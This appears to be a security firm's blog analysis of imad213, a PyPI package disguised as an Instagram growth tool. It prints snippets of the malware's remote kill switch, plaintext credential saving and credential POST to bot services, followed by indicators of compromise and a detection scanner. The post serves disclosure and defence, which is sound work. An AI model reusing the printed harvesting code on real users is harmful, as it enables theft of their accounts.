PyPI Package Disguised as Instagram Growth Tool Harvests User Credentials

A deceptive PyPI package posing as an Instagram growth tool collects user credentials and sends them to third-party bot services.

Kush Pandya

June 6, 2025

I just wanted more Instagram followers. Now someone has my password!

Socket's Threat Research Team discovered imad213, a Python-based credential harvester claiming to be an Instagram growth tool, created by threat actor im_ad__213 (email: madmadimado59@gmail[.]com). The malware uses base64 encoding to hide its true nature and implements a remote kill switch through a Netlify-hosted control file. When executed, it prompts users for Instagram credentials and broadcasts them to ten different third-party bot services while pretending to boost follower counts.

Interestingly, the threat actor has created multiple malicious tools beyond this Instagram credential harvester:

  1. Free Fire Phishing Kits: Creates fake game reward pages using Flask and ngrok to harvest Facebook, Gmail, Twitter, and VK credentials [taya, a-b27]
  2. DDoS Attack Tool: Uses Apache Bench to target streaming platforms and APIs with flood attacks [poppo213]

All tools share consistent branding ("IMAD-213"), identical ASCII art, and similar coding patterns, indicating a single threat actor building a diverse attack toolkit.

*Socket AI Scanner's analysis of the malicious imad213 package.*

How Users Find and Trust This Malware

The imad213 package presents itself professionally on GitHub with a detailed README advertising Instagram growth features:

*imad213's README on GitHub*

The README even includes a deceptive safety tip: "Requires a Temporary Account: Safely use a fake or temporary Instagram account to avoid risks to your main account." This creates a false sense of security: users think they're being cautious while still handing valid credentials to the attacker.

This legitimate appearance, combined with simple installation instructions (pip install imad213), convinces users they're downloading a real Instagram tool. The package likely spreads through forums and Discord servers where users share "growth hacks".

When executed, the tool's "INSTA-FOLLOWERS" branding reinforces users' expectations, making them comfortable entering credentials they believe will be used for legitimate growth services.

Remote Kill Switch: The Attacker's Control Mechanism

Before stealing any credentials, the malware first connects to the attacker's server to check whether it's allowed to run. It fetches a file hosted on Netlify (https://imad-213-imad21[.]netlify[.]app/pass[.]txt) and looks for a specific password. This check happens automatically in the background, without any indication to the victim. The attacker controls this file and can change it at any time.

```python
import requests

# ANSI colour codes used for the tool's console banner (assumed; not shown in the excerpt)
GREEN, RED, RESET = "\033[92m", "\033[91m", "\033[0m"

def check_initial_request():
    # Defanged control URL; the live sample fetches the attacker's Netlify-hosted file
    url = "https://imad-213-imad21[.]netlify[.]app/pass[.]txt"
    try:
        response = requests.get(url)
        if response.status_code == 200:
            content = response.text.strip()  # Read control file
            if content == "imad213":  # Authentication check
                print(f"{GREEN}INSTAGRAM-LOGIN{RESET}")
                return True
            else:
                print(f"{RED}IMAD-213{RESET}")
                return False
    except requests.RequestException:
        # The excerpt's exception handler is cut off; a network failure leaves the tool disabled
        return False
```

Why implement this kill switch? Several reasons:

  1. Control Who Uses It: The attacker might sell this tool to specific people. By changing the control file, they can enable or disable access for everyone.
  2. Emergency Shutdown: If law enforcement starts investigating, the attacker can change one file on Netlify, and every copy of the malware worldwide stops working instantly.
  3. Avoid Detection: Security researchers analyzing the malware might find it disabled, making it harder to understand how it works.
  4. Self-Promotion: When disabled, the tool opens the attacker's Instagram profile (nasreddin_imad), essentially advertising: "Follow me for more hacking tools."

This gives the attacker remote control over their malware, like having a master switch that can turn off all copies at once, without victims ever knowing this check is happening.

Local Credential Storage as Social Engineering

After passing the remote check, the tool prompts for Instagram credentials. The malware writes the username and password directly to credentials.txt in plaintext on the victim's own machine. The Arabic comment in the code (which translates to "Function to save account data in file") may offer clues about the threat actor while also obscuring the code's purpose from casual inspection.

```python
# دالة لحفظ بيانات الحساب في ملف  (Function to save account data in a file)
def save_credentials(username, password):
    # Plaintext write into the current working directory on the victim's machine
    with open("credentials.txt", "w") as file:
        file.write(f"{username}\n{password}")
    print("Credentials saved successfully.")
```

This local storage serves as social engineering, making the tool appear legitimate with a "convenience" feature for saving login details. However, the real attack happens in the next phase.

Credential Broadcast to Unknown Bot Services

Here's where the attack becomes particularly dangerous: the victim's Instagram username and password aren't just saved locally; they're broadcast to ten different bot service websites. The tool submits them to Turkish bot services that pose as legitimate Instagram growth services, complete with professional-looking landing pages and login forms, while the backend receives the complete login credentials:

```python
import requests

# The excerpt does not show how these are defined; placeholders stand in for them here
session = requests.Session()
login_url = "https://<bot-service>/login"  # one of the ten bot services (placeholder)
headers = {"User-Agent": "<browser user agent>"}  # placeholder
username, password = "<victim username>", "<victim password>"  # values typed by the victim

login_data = {
    "username": username,  # Your actual Instagram username
    "password": password,  # Your actual Instagram password
    "userid": "",
    "antiForgeryToken": "5e65770c2420a986097445ab74b0e24b"
}
# This same data is sent to ALL 10 services
response = session.post(login_url, headers=headers, data=login_data)
```
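As an added defender-side example (not code from the package or from Socket), the following heuristic scanner uses Python's ast module to flag the three behaviours described in the kill-switch, local-storage and broadcast sections above: an HTTP fetch whose body is compared against a string literal, a password written to a local file, and a POST whose body dictionary carries a password key. It runs over a constructed sample that mirrors the shape of the quoted snippets with placeholder hosts and token; the tag names and heuristics are my own.

```python
import ast

# Constructed sample mirroring the shape of the imad213 snippets quoted above (placeholder hosts and token).
SAMPLE = '''
def check_initial_request():
    response = requests.get("https://control-host.invalid/pass.txt")
    content = response.text.strip()
    return content == "expected-token"
def save_credentials(username, password):
    with open("credentials.txt", "w") as file:
        file.write(f"{username}\\n{password}")
def send_login(session, login_url, headers, username, password):
    login_data = {"username": username, "password": password}
    return session.post(login_url, headers=headers, data=login_data)
def fetch_version():
    return requests.get("https://example.invalid/version").json()
'''

def _call_name(call):  # requests.get -> 'get', open -> 'open', session.post -> 'post'
    f = call.func
    return f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", "")

def scan_source(src):
    """Map each function name to the set of suspicious behaviours found in its body."""
    findings = {}
    for fn in ast.walk(ast.parse(src)):
        if not isinstance(fn, ast.FunctionDef):
            continue
        names, keys, calls, attrs, str_compare = set(), set(), set(), set(), False
        for node in ast.walk(fn):
            if isinstance(node, ast.Name):
                names.add(node.id)
            elif isinstance(node, ast.Attribute):
                attrs.add(node.attr)
            elif isinstance(node, ast.Dict):
                keys.update(k.value for k in node.keys if isinstance(k, ast.Constant))
            elif isinstance(node, ast.Call):
                calls.add(_call_name(node))
            elif isinstance(node, ast.Compare):  # any comparison against a string literal
                str_compare |= any(isinstance(getattr(c, "value", None), str) for c in node.comparators)
        tags = set()
        if "get" in calls and "text" in attrs and str_compare:  # fetch body, then gate on a literal
            tags.add("remote-kill-switch")
        if {"open", "write"} <= calls and "password" in names:  # credentials written to disk
            tags.add("plaintext-credential-file")
        if "post" in calls and "password" in keys:              # password inside an outbound POST
            tags.add("credential-post")
        if tags:
            findings[fn.name] = tags
    return findings
```

The benign fetch_version function in the sample produces no finding, so the three tags only fire when a fetch, a file write or a POST is combined with the credential-handling pattern this package shows.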

These sites display warnings like "This site has no connection to Instagram" and "Your transactions are performed using your username and password and the Instagram API system" to appear transparent. However, victims have no visibility into what actually happens with their credentials once submitted. The services could be:

  • Storing credentials in databases for later use
  • Selling login information on underground markets
  • Using accounts for spam or bot networks
  • Harvesting personal data and follower lists
  • Sharing credentials with other malicious actors

*Malicious website takipcimx[.]net poses as a legitimate Instagram growth service, complete with professional-looking landing pages and login forms.*

The bot services receiving credentials are listed in the Indicators of Compromise section below.

Analysis of Bot Service Infrastructure

Our investigation into the bot services receiving Instagram credentials reveals an advanced, coordinated operation. These aren't independent websites but rather a network of related services designed to harvest credentials at scale.

*VirusTotal detects takipcimx[.]net as malicious, with vendors including Kaspersky flagging it for phishing activity.*

*WHOIS records confirm the malicious domains share the same Turkish registrar and privacy protection, and were registered within the same week.*

Key patterns across all investigated domains:

  • Registered through the same Turkish telecom company
  • Created within days of each other in June 2021
  • Use identical privacy protection services
  • Share Cloudflare infrastructure for DDoS protection
  • All actively maintained with recent updates

This coordination strongly suggests these sites are operated by the same entity. The infrastructure has been operational for nearly four years, indicating a long-term credential harvesting operation rather than a temporary scam.

Real-World Impact

Instagram has over 2 billion monthly active users, making it a prime target for both legitimate marketers and malicious actors. The platform's engagement-driven algorithm has spawned a cottage industry of growth tools promising instant followers, likes, and views. While Instagram's API supports legitimate automation for business accounts, underground services bypass these restrictions entirely. According to Instagram's Community Guidelines, using third-party apps to artificially inflate metrics can result in immediate account suspension or permanent bans.

Users who run this tool face multiple consequences:

  • Immediate Account Compromise: Credentials are shared with 10+ external services that can access private messages, post content, or change passwords
  • Instagram Policy Violations: Using bot services violates Instagram's Terms of Use, which explicitly prohibits:
    • Using automated means to collect information or interact with the service
    • Creating accounts or accessing content through unauthorized methods
    • Buying, selling, or transferring any aspect of your account (including your username)
    Violations can result in:
      • Account suspension or permanent termination
      • Reduced distribution of content (often called "shadowbanning")
      • Removal of inauthentic followers, likes, and comments
      • Legal action in severe cases
  • Password Reuse Risk: If victims use the same password elsewhere, multiple accounts become vulnerable
  • Identity Theft Potential: Compromised Instagram accounts contain personal photos, direct messages, and connections to other social media accounts

Outlook and Recommendations

The emergence of this credential harvester reveals concerning trends in social media-targeted malware. As Instagram and other platforms continue to crack down on bot services, we expect attackers to evolve their tactics in several ways:

Distributed Infrastructure: The use of Netlify for remote control suggests future malware may increasingly leverage legitimate hosting services to avoid detection. Attackers could expand to GitHub Pages, Vercel, or other free platforms that security tools typically trust, making kill switches harder to identify and block.

Credential Laundering Networks: With ten different bot services receiving credentials, we're seeing the early stages of credential laundering—where stolen logins are distributed across multiple services to obscure their origin. Future variants may incorporate cryptocurrency payments or use decentralized networks to create untraceable credential marketplaces.

Social Engineering Evolution: The local credential storage feature, while seemingly pointless, demonstrates convincing social engineering. Future iterations might include fake "security features" like bogus two-factor authentication or password strength meters to increase victim trust and capture additional security information.

Cross-Platform Targeting: Given that the same threat actor created Free Fire phishing kits and DDoS tools, we anticipate more unified attack frameworks that can target multiple platforms simultaneously. A single toolkit could harvest Instagram, TikTok, gaming, and banking credentials while maintaining the same command infrastructure.

Socket's security tools can help protect against these threats by analyzing package behaviors in real time to detect dangerous patterns like those seen in this campaign. Our free GitHub app flags risks directly in pull requests, the CLI alerts during package installations, and our browser extension provides security insights on npm package pages, helping developers identify potential supply chain threats before they enter your codebase.

Similar Research

The consistent targeting of Instagram, TikTok, Telegram, and other social media platforms highlights their value to threat actors. With billions of active users and often-reused passwords across platforms, compromising one social media account frequently provides access to others, creating a domino effect that amplifies the impact of credential theft campaigns.

Indicators of Compromise (IOCs)

  • Threat Actor Identifiers
    • PyPI alias: im_ad__213 or IMAD-213
    • PyPI registered email: madmadimado59@gmail[.]com
    • GitHub: https://github[.]com/imadoo27/
  • Control URL: imad-213-imad21.netlify[.]app/pass.txt
  • Attacker's Instagram: instagram[.]com/nasreddin_imad
  • Bot Services:
    • takipcimx[.]net
    • takipcizen[.]com
    • bigtakip[.]net
    • takip88[.]com
    • takipciking[.]net
    • takipcigen[.]com
    • takipcikrali[.]com
    • takipcitime[.]net
    • instamoda[.]org
  • Local File: credentials.txt (plaintext storage)
  • Anti-forgery Token: 5e65770c2420a986097445ab74b0e24b

MITRE ATT&CK Techniques

  • T1027 — Obfuscated Files or Information
  • T1566.002 — Phishing
  • T1041 — Exfiltration over C2 channel
  • T1195.002 — Supply Chain Compromise: Compromise Software Supply Chain
